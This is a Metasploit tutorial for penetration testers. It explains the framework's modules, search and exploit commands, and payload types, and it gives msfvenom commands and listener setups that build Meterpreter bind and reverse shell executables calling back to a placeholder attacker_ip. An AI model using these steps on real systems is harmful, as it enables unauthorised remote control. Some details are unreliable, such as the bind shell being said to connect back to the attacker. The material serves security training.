Metasploit: The Ultimate Guide for Penetration Testing

Metasploit is the world’s most popular open-source penetration testing framework. It provides a comprehensive collection of tools and resources for identifying, exploiting, and mitigating security vulnerabilities. Whether you’re a seasoned security professional or just starting out in the field, Metasploit is a valuable tool that can help you improve your security posture.

What is Metasploit?

Metasploit is a modular framework that allows you to:

• Discover vulnerabilities: Metasploit includes a vast database of exploits, vulnerabilities, and payloads that can be used to identify potential weaknesses in your systems.
• Exploit vulnerabilities: Once you’ve identified a vulnerability, Metasploit can help you exploit it to gain unauthorized access to a system.
• Develop custom exploits: Metasploit provides a powerful scripting language that allows you to develop your own custom exploits.
• Manage your pentesting workflow: Metasploit includes a number of tools and features that can help you manage your pentesting workflow, such as a project management system and a reporting tool.

Benefits of using Metasploit

There are several benefits to using Metasploit for penetration testing:

• Open-source: Metasploit is free to use and open-source, which means that anyone can contribute to its development. This makes it a constantly evolving platform with a large and active community of users.
• Comprehensive: Metasploit includes a vast database of exploits, vulnerabilities, and payloads, making it one of the most comprehensive penetration testing tools available.
• Flexible: Metasploit is modular and can be customized to meet your specific needs. You can add your own exploits, payloads, and modules to the framework.
• Easy to use: Metasploit has a user-friendly interface and command-line tools that make it easy to use for both beginners and experienced penetration testers.
• Well-documented: Metasploit is well-documented with extensive online resources, tutorials, and guides that can help you get started and learn how to use the framework effectively.

Getting started with Metasploit

There are two main ways to get started with Metasploit:

• Download and install the Metasploit Framework: Metasploit can be installed on various platforms, including Linux, Windows, and macOS. Follow the installation guide provided on the official Metasploit website or use pre-built tools like Kali Linux, which comes with Metasploit pre-installed.

• Use Metasploit online: Rapid7, the company that owns Metasploit, offers a free online version of the framework that you can access through your web browser. This is a great option if you want to try out Metasploit without having to install anything on your computer.

Once you have access to Metasploit, you can start exploring the different modules and tools that are available. The best way to learn how to use Metasploit is to start with the basics and then gradually work your way up to more advanced concepts.

Components of Metasploit

• Framework: The core of Metasploit, providing a platform for vulnerability analysis and exploitation.

• Database: Allows users to store gathered information and results for later analysis and reporting.

• Exploits: Think of an exploit as the tool or technique used to take advantage of a vulnerability in a system or software. It’s like finding the key to unlock a door. An exploit helps gain unauthorized access or control over a system by exploiting a specific weakness or security flaw.

• Payloads: A payload, is what happens after the exploit successfully breaches the system. It’s the ‘package’ of instructions or actions that the attacker wants to execute on the compromised system. It could be anything from installing malware, gaining remote access, capturing data, or performing specific tasks on the targeted system.

  In essence, the exploit is the method used to get into the system, while the payload is what the attacker wants to do once inside—like opening the door with the key (exploit) and then delivering a package (payload) inside the room.

• Modules: A collection of payloads, exploits, auxiliary modules, and post-exploitation modules.

• Auxiliary Modules: Auxiliary modules in Metasploit are versatile tools used for tasks like scanning, reconnaissance, vulnerability identification, and even limited attacks like DoS. They help gather information, assess vulnerabilities, and perform actions beyond traditional exploitation, enriching the assessment of a system’s security.

• Metasploit Encoders: Encoders in Metasploit are used to transform payloads into different formats to evade detection by antivirus software or intrusion detection systems. They encode the payload, making it harder for security mechanisms to recognize and block it. Encoders basically obfuscate the payload without changing its functionality.

• Evasion Techniques: Evasion techniques in Metasploit involve methods to bypass or evade security measures such as firewalls, intrusion detection systems, or antivirus software. These techniques aim to hide the true nature of an attack or payload, making it difficult for security systems to detect and block it.

• NOPs (No-Operation Sleds): NOP sleds are used in exploitation to ensure that the execution flow lands at the start of the payload. They consist of a series of no-operation instructions (NOPs) that lead to the actual exploit code. This technique helps in aligning the execution pointer to the beginning of the payload.

• Post-Exploitation Modules: Post-exploitation modules in Metasploit provide functionalities for maintaining access and control over a compromised system after successful exploitation. These modules allow an attacker to perform various actions on the target system, such as extracting information, escalating privileges, installing backdoors, or executing additional commands.

Interface Overview

• msfconsole: The command-line interface providing access to the framework’s functionalities.
• msfvenom: For generating various payloads.
• msfdb: Handles the Metasploit database.

Basic Commands

• use <module>: Select a module.
• show options: View and set required options for the selected module.
• set <option> <value>: Set values for module options.
• exploit or run: Execute the selected module.

Metasploit Console

The Metasploit console is the primary interface for interacting with the framework. The console provides a command-line interface that allows you to execute commands, view information about modules and tools, and launch attacks.

The Metasploit console is a powerful tool that can be used to perform a wide range of penetration testing tasks. However, it can be difficult to learn and use for beginners. To help you get started, here are some of the most common Metasploit console commands:

Common Metasploit Console Commands

Metasploit Commands Explained

Here are some of the most common Metasploit commands explained in more detail:

Search: The search command can be used to search for modules based on specific keywords. For example, the following command will search for all exploits that target Windows systems:

1

search type:exploit platform:windows

In metasploit search we have ranking for the exploits. Rankings are listed below:

• Excellent: Exploits categorized as excellent would typically demonstrate exceptional reliability, high impact, widespread usage, and effectiveness across various environments. These exploits are considered top-tier due to their reliability, impact, and popularity among security professionals.

• Great/Good: These categories might encompass exploits that perform reliably in most scenarios, have significant impact, and are commonly used within the community. They might lack the widespread usage or impact of “excellent” exploits but are still considered highly effective.

• Normal/Average: Exploits falling into this category might be reliable in specific scenarios but could lack widespread impact or usage. They might be considered decent options but may not be the first choice for high-stakes penetration tests or assessments.

• Low: Exploits labeled as low might have limited reliability, lower impact, or might be less commonly used due to various limitations. They might work in specific, constrained environments but are not reliable or impactful across a broad spectrum.

• Manual: This category could encompass exploits that require significant manual intervention, customization, or expertise to execute successfully. These exploits might not have a straightforward implementation process and might be less commonly used due to their complexity.

Sample example is shown below. We are searching for the word exploit using the search command.

msf6 > search exploit

You can also combine multiple parameters like: search exploit rank:gte500 (searches with the word exploit containing rank greater than or equal to 500)

Search example:

• search windows

• search exploit

• search exploit vsftpd

• search payload meterpreter

• search auxiliary scanner

• search post/windows

• search type:post description

• search name:Microsoft type:exploit rank: great

• search platform:Windows type:exploit description:smb rank:excellent

• search platform:Windows type:exploit description:dcom rank:gte600

• search exploit/windows

• search exploit/windows “buffer overflow”

Info: The info command can be used to display information about a specific module. or you can continue from the search output. When you search for a word in metasploit and like to view information about the item in line 5, you can directly say info 5 or use the full path as shown below.

For example, the following command will display information about the exploit module “ms08_067_netapi”:

1

info exploit/windows/smb/ms08_067_netapi

Use: The use command can be used to load a specific module. If you’re using search, you can use the search output number like use 4 to load the 4rth module from the output. For example, the following command will load the exploit module “ms08_067_netapi”:

1

use exploit/windows/smb/ms08_067_netapi

Show options: The show options command can be used to display the options for a loaded module. For example, the following command will display the options for the exploit module “ms08_067_netapi”:

1

show options exploit/windows/smb/ms08_067_netapi

Set: The set command can be used to set the value of a module option. For example, the following command will set the RHOST option of the exploit module “ms08_067_netapi” to the IP address 192.168.1.1:

1

set RHOST 192.168.1.1

Exploit: The exploit command can be used to execute a loaded exploit. For example, the following command will execute the exploit module “ms08_067_netapi”:

1

exploit

Run: The run command can be used to execute a loaded auxiliary module. For example, the following command will execute the auxiliary module “port_scanner”:

1
2
3

run auxiliary/scanner/portscan/tcp
or just
run

After the exploit and payload are set you can use exploit or run command to implement the exploit.

Back: The back command can be used to unload the current module. This is useful if you want to switch to a different module.

1

back

Exit: The exit command can be used to exit the Metasploit console.

1

exit

Show: After you’ve selected the exploit and payload, you can use show command to get more details about what to do next. Some examples:

show targets

show options - shows all the options for the loaded module.

show payloads

grep “reverse_tcp” show payloads (In Linux we use command and grep. But in msfconsole we have to use grep first)

These are just a few of the most common Metasploit console commands. There are many other commands available, and you can learn more about them by reading the Metasploit documentation.

Sample example:

1
2
3
4
5
6
7

search dcom
use 4
grep "reverse_tcp" show payloads
set payload 81
show options - to view the required options on that module/payload selected.
set LHOST and set LPORT
exploit or run - anything will work.

background: move a current session to background after you’re connected to a victim.

sessions [session id]: list all sessions.

sessions -C screenshot -i 2,3: captures screenshot of machines in sessions 2 and 3.

Metasploit Parameters Explained

Here are some of the most important parameter categories and examples:

Target Parameters:

• RHOST: The IP address or hostname of the target system.
• RPORT: The port number of the target system.
• TARGET: Target system specification.
• VERBOSE: Enable verbose output for detailed information.
• THREADS: Number of concurrent threads to use.

Payload Parameters:

• PAYLOAD: The name of the payload to be delivered.
• LHOST: The IP address or hostname of the attacker system to receive the connection. In short, LHOST in a reverse payload sets the destination IP address to which the compromised system will connect or send information back to after being exploited.
• LPORT: The port number on the attacker system to receive the connection.

Exploit Parameters:

• VERBOSE: Enables verbose output for the exploit.
• NOPCOUNT: The number of NOP instructions to insert into the exploit.
• SSL: Enables SSL encryption for the exploit.

Auxiliary Module Parameters:

• THREADS: The number of threads to use for the auxiliary module.
• DEPTH: The depth of the scan for the auxiliary module.
• FILTER: The filter to apply to the results of the auxiliary module.

Encoder Parameters:

• ENCODER: The name of the encoder to use.
• BADCHARS: The characters to be avoided by the encoder.
• PASSENC: The password to be used for the encoder.

Nops Parameters:

• NOPSIZE: The size of the NOP sled.
• NOREPEAT: Prevents the NOP sled from repeating.

These are just a few examples of the many parameters used in Metasploit. You can find a complete list of parameters for each module in the Metasploit documentation.

Advanced Metasploit Techniques

Once you’re comfortable with the basics of Metasploit, you can start exploring some of the more advanced techniques. Here are a few examples:

• Developing custom exploits: Metasploit provides a powerful scripting language that allows you to develop your own custom exploits. This is a great way to target vulnerabilities that are not covered by existing exploits.
• Using post modules: Post modules can be used to interact with a system after an exploit has been successful. This allows you to maintain access to the system, steal data, or escalate privileges.
• Automating tasks: Metasploit can be used to automate a variety of tasks, such as scanning for vulnerabilities, launching exploits, and gathering information. This can save you a lot of time and effort.

Payloads and Encoders:

Understanding payloads and encoders is crucial for delivering attacks successfully. Payloads are the malicious code executed on the target system after an exploit has been successful. Different payloads serve different purposes, such as:

• Reverse shells: Create a connection back to the attacker’s machine for remote access.
• Bind shells: Listen on a specific port on the target machine for connections.
• Meterpreter: A powerful post-exploitation framework that enables various actions.
• File system access: Allows for download, upload, and manipulation of files.

Encoders are used to obfuscate payloads, making them less likely to be detected by security software. Some common encoding techniques include:

• Alpha blending: Makes the payload blend in with regular text or data.
• XOR encoding: Encrypts the payload using an XOR operation.
• Shift encoding: Shifts the bytes of the payload by a specific value.

Choosing the right payload and encoder for a specific attack depends on various factors such as target system, desired outcome, and security controls in place.

Auxiliary Modules:

Auxiliary modules are versatile tools used for various tasks besides exploiting vulnerabilities. Some common functions include:

• Scanning: Identifying open ports, services, and vulnerabilities on target systems.
• Gathering information: Collecting information about the target system, such as usernames, operating system, and network details.
• Denial-of-service (DoS): Disrupting services or applications on the target system.
• Maintaining access: Establishing persistence on the target system for long-term control.

Post Modules:

Post modules come into play after successfully exploiting a vulnerability and gaining initial access. They offer functionalities like:

• Privilege escalation: Elevating privileges to gain higher access levels on the target system.
• Lateral movement: Moving across the network to other vulnerable systems.
• Data exfiltration: Stealing sensitive data from the target system.
• Credential harvesting: Obtaining user credentials for further access and privilege escalation.

Post modules empower attackers to perform various actions beyond simply exploiting a vulnerability, allowing them to achieve their objectives like data theft or maintaining long-term control over the compromised system.

Automating Tasks with Metasploit:

Metasploit offers scripting capabilities to automate repetitive tasks, saving time and effort. Scripts can be written in various languages like Ruby and Python, enabling automated scanning, exploitation, and post-exploitation activities.

Metasploit Payloads

Payloads are the malicious code that is delivered to a victim system after an exploit has been successful. Payloads can be used for a variety of purposes, such as:

• Maintaining access to the system: Payloads can be used to install backdoors on a system, which allow you to maintain access to the system even after the exploit has been patched.
• Stealing data: Payloads can be used to steal data from a victim system, such as usernames, passwords, and financial information.
• Escalating privileges: Payloads can be used to escalate privileges on a victim system, which allows you to gain more control over the system.
• Denying service: Payloads can be used to launch denial-of-service attacks, which can prevent legitimate users from accessing a system.

Metasploit includes a large database of payloads that cover a wide range of purposes. You can choose the payload that best suits your needs based on your goals for the penetration test.

Types of Payloads

There are two main types of payloads:

• Single-stage payloads: Single-stage payloads are self-contained and do not require any additional files to be downloaded to the victim system. They are typically used for simple attacks where you only need to gain initial access to the system.
• Staged payloads: Staged payloads consist of two parts: a small stub loader and a larger payload file. The stub loader is downloaded to the victim system first, and it then downloads the larger payload file from the attacker’s system. Staged payloads are typically used for more complex attacks where you need to install a backdoor or steal data.

Choosing a Payload

When choosing a payload, you need to consider a number of factors, such as:

• The target operating system: Different payloads are designed to work on different operating systems.
• The architecture of the target system: Different payloads are designed to work on different architectures, such as x86 and x64.
• Your goals for the penetration test: Different payloads are designed for different purposes.
• The level of risk: Some payloads are more likely to be detected by security software than others.

Once you have considered these factors, you can choose the payload that best suits your needs.

Generating a Payload

Generate a reverse shell payload to gain access to a target system.

1

msfvenom -p <payload> LHOST=<attacker_ip> LPORT=<attacker_port> -f <format> -o <output_file>

Metasploit Resources

There are a number of great resources available online that can help you learn more about Metasploit payloads. Here are a few of my favorites:

• The official Metasploit documentation: https://docs.rapid7.com/metasploit/
• The Metasploit Unleashed book: https://www.offsec.com/category/metasploit-unleashed-training/
• The Metasploit Project blog: https://www.rapid7.com/blog/tag/metasploit/
• The Metasploit community forums: https://discuss.rapid7.com/

Meterpreter

Meterpreter is an advanced, post-exploitation payload in the Metasploit Framework, allowing an attacker to control a compromised system fully. It’s designed for various penetration testing tasks, offering a range of commands to interact with the target system. Here’s a table of some useful Meterpreter commands:

These commands can be powerful in the hands of a penetration tester or an ethical hacker but should only be used on systems where you have proper authorization. Always ensure you have permission to perform security testing or any actions on the targeted systems.

Meterpreter Bind TCP

A Meterpreter bind shell is a type of payload that allows an attacker to create a listening port on a compromised system. When the target system executes the payload, it establishes a connection back to the attacker’s machine, providing the attacker with an interactive shell on the target.

Here’s a general outline of how you might set up a Meterpreter bind shell using the Metasploit Framework:

1. Generate Payload: Use Metasploit’s msfvenom tool to generate the Meterpreter bind shell payload. For example:

   1	msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe -o bind_shell_payload.exe

   This command generates a Windows Meterpreter bind shell payload, listening on port 4444, and saves it as bind_shell_payload.exe.

2. Set Up Listener: Start Metasploit and set up a listener to catch the incoming connection from the target:

   1 2 3 4

   use exploit/multi/handler set payload windows/meterpreter/bind_tcp set LPORT 4444 exploit

   This tells Metasploit to listen for incoming connections on port 4444 using the Meterpreter bind shell payload.

3. Execute on Target: Transfer the generated bind_shell_payload.exe to the target system and execute it. Once executed, the attacker’s machine should receive a Meterpreter session.

Meterpreter Reverse Shell

A reverse shell is a type of shell session initiated from a target machine back to an attacker-controlled system. It’s a powerful technique used in penetration testing or hacking scenarios to gain control and access to a compromised system. You set up a reverse shell when you need the victim to make a connection back to you.

A Meterpreter reverse shell is a powerful payload used to establish a connection from the target machine back to the attacker’s system. This allows the attacker to gain control over the compromised system. Here’s a general guide on how to set up a Meterpreter reverse shell using the Metasploit Framework:

1. Generate Payload: Use msfvenom in Metasploit to create the reverse shell payload. For example, to generate a Windows reverse TCP Meterpreter payload:

   1	msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe -o reverse_shell_payload.exe

   Replace attacker_ip with your actual IP address. This command creates a Windows Meterpreter reverse shell payload that connects back to your machine’s IP address on port 4444 and saves it as reverse_shell_payload.exe.

2. Set Up Listener: In Metasploit, configure a listener to catch the incoming connection:

   1 2 3 4 5

   use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST attacker_ip set LPORT 4444 exploit

   Again, replace attacker_ip with your actual IP address. This sets up a listener to catch the incoming reverse shell connection.

3. Execute on Target: Transfer the generated reverse_shell_payload.exe to the target system and execute it. Once the payload is executed on the target system, it establishes a connection back to your machine, providing you with a Meterpreter session.

Conclusion

Metasploit is a powerful and versatile framework that can be used for a wide range of penetration testing tasks. By understanding the basics of the framework, exploring advanced techniques, and practicing ethical hacking principles, you can leverage Metasploit to improve your security posture and become a proficient security professional.